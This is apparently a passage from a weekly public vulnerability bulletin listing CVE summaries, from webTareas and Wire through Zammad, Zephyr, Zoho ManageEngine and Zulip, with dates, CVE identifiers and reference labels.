webTareas version 2.4 and earlier allows an authenticated user to store arbitrary web script or HTML by creating or editing a client name in the clients section, due to incorrect sanitization of user-supplied data and achieve a Stored Cross-Site Scripting attack against the platform users and administrators. The affected endpoint is /clients/editclient.php, on the HTTP POST cn parameter.2021-10-08not yet calculatedCVE-2021-41917
MISC
wire -- wire
 
Wire is an open source secure messenger. In affected versions if the an attacker gets an old but valid access token they can take over an account by changing the email. This issue has been resolved in version 3.86 which uses a new endpoint which additionally requires an authentication cookie. See wire-ios-sync-engine and wire-ios-transport references. This is the root advisory that pulls the changes together.2021-10-04not yet calculatedCVE-2021-41093
MISC
MISC
MISC
MISC
CONFIRM
wire -- wire
 
Wire is an open source secure messenger. Users of Wire by Bund may bypass the mandatory encryption at rest feature by simply disabling their device passcode. Upon launching, the app will attempt to enable encryption at rest by generating encryption keys via the Secure Enclave, however it will fail silently if no device passcode is set. The user has no indication that encryption at rest is not active since the feature is hidden to them. This issue has been resolved in version 3.702021-10-04not yet calculatedCVE-2021-41094
MISC
CONFIRM
wire-server -- wire-server
 
Wire-server is the backing server for the open source wire secure messaging application. In affected versions it is possible to trigger email address change of a user with only the short-lived session token in the `Authorization` header. As the short-lived token is only meant as means of authentication by the client for less critical requests to the backend, the ability to change the email address with a short-lived token constitutes a privilege escalation attack. Since the attacker can change the password after setting the email address to one that they control, changing the email address can result in an account takeover by the attacker. Short-lived tokens can be requested from the backend by Wire clients using the long lived tokens, after which the long lived tokens can be stored securely, for example on the devices key chain. The short lived tokens can then be used to authenticate the client towards the backend for frequently performed actions such as sending and receiving messages. While short-lived tokens should not be available to an attacker per-se, they are used more often and in the shape of an HTTP header, increasing the risk of exposure to an attacker relative to the long-lived tokens, which are stored and transmitted in cookies. If you are running an on-prem instance and provision all users with SCIM, you are not affected by this issue (changing email is blocked for SCIM users). SAML single-sign-on is unaffected by this issue, and behaves identically before and after this update. The reason is that the email address used as SAML NameID is stored in a different location in the databse from the one used to contact the user outside wire. Version 2021-08-16 and later provide a new end-point that requires both the long-lived client cookie and `Authorization` header. The old end-point has been removed. 
If you are running an on-prem instance with at least some of the users invited or provisioned via SAML SSO and you cannot update then you can block `/self/email` on nginz (or in any other proxies or firewalls you may have set up). You don't need to discriminate by verb: `/self/email` only accepts `PUT` and `DELETE`, and `DELETE` is almost never used.2021-10-04not yet calculatedCVE-2021-41100
CONFIRM
wordpress -- wordpressThe FV Flowplayer Video Player WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the player_id parameter found in the ~/view/stats.php file which allows attackers to inject arbitrary web scripts, in versions 7.5.0.727 - 7.5.2.727.2021-10-06not yet calculatedCVE-2021-39350
MISC
MISC
wordpress -- wordpressThe WP Bannerize WordPress plugin is vulnerable to authenticated SQL injection via the id parameter found in the ~/Classes/wpBannerizeAdmin.php file which allows attackers to exfiltrate sensitive information from vulnerable sites. This issue affects versions 2.0.0 - 4.0.2.2021-10-06not yet calculatedCVE-2021-39351
MISC
MISC
wordpress -- wordpress
 
The Stripe for WooCommerce WordPress plugin is missing a capability check on the save() function found in the ~/includes/admin/class-wc-stripe-admin-user-edit.php file that makes it possible for attackers to configure their account to use other site users unique STRIPE identifier and make purchases with their payment accounts. This affects versions 3.0.0 - 3.3.9.2021-10-04not yet calculatedCVE-2021-39347
MISC
MISC
xen -- certain_pci_devices
 
PCI devices with RMRRs not deassigned correctly Certain PCI devices in a system might be assigned Reserved Memory Regions (specified via Reserved Memory Region Reporting, "RMRR"). These are typically used for platform tasks such as legacy USB emulation. If such a device is passed through to a guest, then on guest shutdown the device is not properly deassigned. The IOMMU configuration for these devices which are not properly deassigned ends up pointing to a freed data structure, including the IO Pagetables. Subsequent DMA or interrupts from the device will have unpredictable behaviour, ranging from IOMMU faults to memory corruption.2021-10-06not yet calculatedCVE-2021-28702
MISC
MLIST
xiuno -- xiuno_bbs
 
A cross-site scripting (XSS) vulnerability in the component install\install.sql of Xiuno BBS 4.0.4 allows attackers to execute arbitrary web scripts or HTML via changing the doctype value to 0.2021-10-04not yet calculatedCVE-2020-21494
MISC
MISC
xiuno -- xiuno_bbs
 
A cross-site scripting (XSS) vulnerability in the component /admin/?setting-base.htm of Xiuno BBS 4.0.4 allows attackers to execute arbitrary web scripts or HTML via the sitename parameter.2021-10-04not yet calculatedCVE-2020-21495
MISC
MISC
xiuno -- xiuno_bbs
 
A cross-site scripting (XSS) vulnerability in the component /admin/?setting-base.htm of Xiuno BBS 4.0.4 allows attackers to execute arbitrary web scripts or HTML via the sitebrief parameter.2021-10-04not yet calculatedCVE-2020-21496
MISC
MISC
xiuno -- xiuno_bbs
 
An issue in the component route\user.php of Xiuno BBS v4.0.4 allows attackers to enumerate usernames.2021-10-04not yet calculatedCVE-2020-21493
MISC
MISC
xyhcms -- xyhcms
 
XYHCMS v3.6 contains a stored cross-site scripting (XSS) vulnerability in the component xyhai.php?s=/Link/index.2021-10-06not yet calculatedCVE-2020-21656
MISC
zammad -- zammadAn issue was discovered in Zammad before 4.1.1. Stored XSS may occur via an Article during addition of an attachment to a Ticket.2021-10-07not yet calculatedCVE-2021-42092
MISC
zammad -- zammadAn issue was discovered in Zammad before 4.1.1. SSRF can occur via GitHub or GitLab integration.2021-10-07not yet calculatedCVE-2021-42091
MISC
zammad -- zammadAn issue was discovered in Zammad before 4.1.1. The Form functionality allows remote code execution because deserialization is mishandled.2021-10-07not yet calculatedCVE-2021-42090
MISC
zammad -- zammadAn issue was discovered in Zammad before 4.1.1. The REST API discloses sensitive information.2021-10-07not yet calculatedCVE-2021-42089
MISC
zammad -- zammadAn issue was discovered in Zammad before 4.1.1. The Chat functionality allows XSS because clipboard data is mishandled.2021-10-07not yet calculatedCVE-2021-42088
MISC
zammad -- zammadAn issue was discovered in Zammad before 4.1.1. An admin can discover the application secret via the API.2021-10-07not yet calculatedCVE-2021-42087
MISC
zammad -- zammadAn issue was discovered in Zammad before 4.1.1. An Agent account can modify account data, and gain admin access, via a crafted request.2021-10-07not yet calculatedCVE-2021-42086
MISC
zammad -- zammadAn issue was discovered in Zammad before 4.1.1. There is stored XSS via a custom Avatar.2021-10-07not yet calculatedCVE-2021-42085
MISC
zammad -- zammadAn issue was discovered in Zammad before 4.1.1. An attacker with valid agent credentials may send a series of crafted requests that cause an endless loop and thus cause denial of service.2021-10-07not yet calculatedCVE-2021-42084
MISC
zammad -- zammad
 
An issue was discovered in Zammad before 4.1.1. An admin can execute code on the server via a crafted request that manipulates triggers.2021-10-07not yet calculatedCVE-2021-42093
MISC
zammad -- zammad
 
An issue was discovered in Zammad before 4.1.1. Command Injection can occur via custom Packages.2021-10-07not yet calculatedCVE-2021-42094
MISC
zehpyr_project-rtos -- zephyr
 
Buffer Access with Incorrect Length Value in zephyr. Zephyr versions >= >=2.5.0 contain Buffer Access with Incorrect Length Value (CWE-805). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-8q65-5gqf-fmw52021-10-05not yet calculatedCVE-2021-3581
MISC
zehpyr_project-rtos -- zephyr_json_decoder
 
Zephyr JSON decoder incorrectly decodes array of array. Zephyr versions >= >1.14.0, >= >2.5.0 contain Attempt to Access Child of a Non-structure Pointer (CWE-588). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-289f-7mw3-2qf42021-10-05not yet calculatedCVE-2021-3510
MISC
zephyrproject-rtos -- zephyr
 
Buffer overflow in Zephyr USB DFU DNLOAD. Zephyr versions >= v2.5.0 contain Heap-based Buffer Overflow (CWE-122). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-c3gr-hgvr-f3632021-10-05not yet calculatedCVE-2021-3625
MISC
zephyrproject-rtos -- zephyr
 
BT: Possible to overwrite an existing bond during keys distribution phase when the identity address of the bond is known. Zephyr versions >= 1.14.2, >= 2.4.0, >= 2.5.0 contain Use of Multiple Resources with Duplicate Identifier (CWE-694). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-j76f-35mc-4h632021-10-05not yet calculatedCVE-2021-3436
MISC
zephyrproject-rtos -- zephyr
 
DOS: Incorrect 802154 Frame Validation for Omitted Source / Dest Addresses. Zephyr versions >= > v2.4.0 contain NULL Pointer Dereference (CWE-476), Attempt to Access Child of a Non-structure Pointer (CWE-588). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-94jg-2p6q-53642021-10-05not yet calculatedCVE-2021-3319
MISC
zoho -- manageengine_admanager_plusZoho ManageEngine ADManager Plus version 7110 and prior allows unrestricted file upload which leads to remote code execution.2021-10-07not yet calculatedCVE-2021-37930
MISC
MISC
zoho -- manageengine_admanager_plusZoho ManageEngine ADManager Plus version 7110 and prior allows unrestricted file upload which leads to remote code execution.2021-10-07not yet calculatedCVE-2021-37931
MISC
MISC
zoho -- manageengine_admanager_plusZoho ManageEngine ADManager Plus version 7110 and prior allows unrestricted file upload which leads to remote code execution.2021-10-07not yet calculatedCVE-2021-37921
MISC
MISC
zoho -- manageengine_admanager_plusZoho ManageEngine ADManager Plus version 7110 and prior is vulnerable to path traversal which allows copying of files from one directory to another.2021-10-07not yet calculatedCVE-2021-37922
MISC
MISC
zoho -- manageengine_admanager_plusZoho ManageEngine ADManager Plus version 7110 and prior allows unrestricted file upload which leads to remote code execution.2021-10-07not yet calculatedCVE-2021-37923
MISC
MISC

zoho -- manageengine_admanager_plus

Zoho ManageEngine ADManager Plus version 7110 and prior allows unrestricted file upload which leads to remote code execution.2021-10-07not yet calculatedCVE-2021-37918
MISC
MISC
zoho -- manageengine_admanager_plusZoho ManageEngine ADManager Plus version 7110 and prior allows unrestricted file upload which leads to remote code execution.2021-10-07not yet calculatedCVE-2021-37924
MISC
MISC
zoho -- manageengine_admanager_plusZoho ManageEngine ADManager Plus version 7110 and prior allows unrestricted file upload which leads to remote code execution.2021-10-07not yet calculatedCVE-2021-37926
MISC
MISC
zoho -- manageengine_admanager_plusZoho ManageEngine ADManager Plus version 7110 and prior allows unrestricted file upload which leads to remote code execution.2021-10-07not yet calculatedCVE-2021-37928
MISC
MISC
zoho -- manageengine_admanager_plusZoho ManageEngine ADManager Plus version 7110 and prior allows unrestricted file upload which leads to remote code execution.2021-10-07not yet calculatedCVE-2021-37929
MISC
MISC
zoho -- manageengine_admanager_plusZoho ManageEngine ADManager Plus version 7110 and prior allows unrestricted file upload which leads to remote code execution.2021-10-07not yet calculatedCVE-2021-37920
MISC
MISC
zoho -- manageengine_admanager_plus
 
Zoho ManageEngine ADManager Plus before 7110 is vulnerable to blind XXE.2021-10-07not yet calculatedCVE-2021-38298
CONFIRM

zoho -- manageengine_admanager_plus
 

Zoho ManageEngine ADManager Plus version 7110 and prior allows unrestricted file upload which leads to remote code execution.2021-10-07not yet calculatedCVE-2021-37919
MISC
MISC
zoho -- manageengine_admanager_plus
 
Zoho ManageEngine ADManager Plus version 7110 and prior allows unrestricted file overwrite leading to remote code execution.2021-10-07not yet calculatedCVE-2021-37762
MISC
MISC
zoho -- zoho
 
A Cross-Site Scripting (XSS) attack can cause arbitrary code (JavaScript) to run in a user’s browser while the browser is connected to a trusted website. The attack targets your application's users and not the application itself while using your application as the attack's vehicle. The XSS payload executes whenever the user changes the form values or deletes a created form in Zoho CRM Lead Magnet Version 1.7.2.4.2021-10-05not yet calculatedCVE-2021-33849
MISC
MISC
zulip -- zulip
 
Zulip is an open source team chat server. In affected versions Zulip allows organization administrators on a server to configure "linkifiers" that automatically create links from messages that users send, detected via arbitrary regular expressions. Malicious organization administrators could subject the server to a denial-of-service via regular expression complexity attacks; most simply, by configuring a quadratic-time regular expression in a linkifier, and sending messages that exploited it. A regular expression attempted to parse the user-provided regexes to verify that they were safe from ReDoS -- this was both insufficient, as well as _itself_ subject to ReDoS if the organization administrator entered a sufficiently complex invalid regex. Affected users should [upgrade to the just-released Zulip 4.7](https://zulip.readthedocs.io/en/latest/production/upgrade-or-modify.html#upgrading-to-a-release), or [`main`](https://zulip.readthedocs.io/en/latest/production/upgrade-or-modify.html#upgrading-from-a-git-repository).2021-10-07not yet calculatedCVE-2021-41115
CONFIRM
MISC
MISC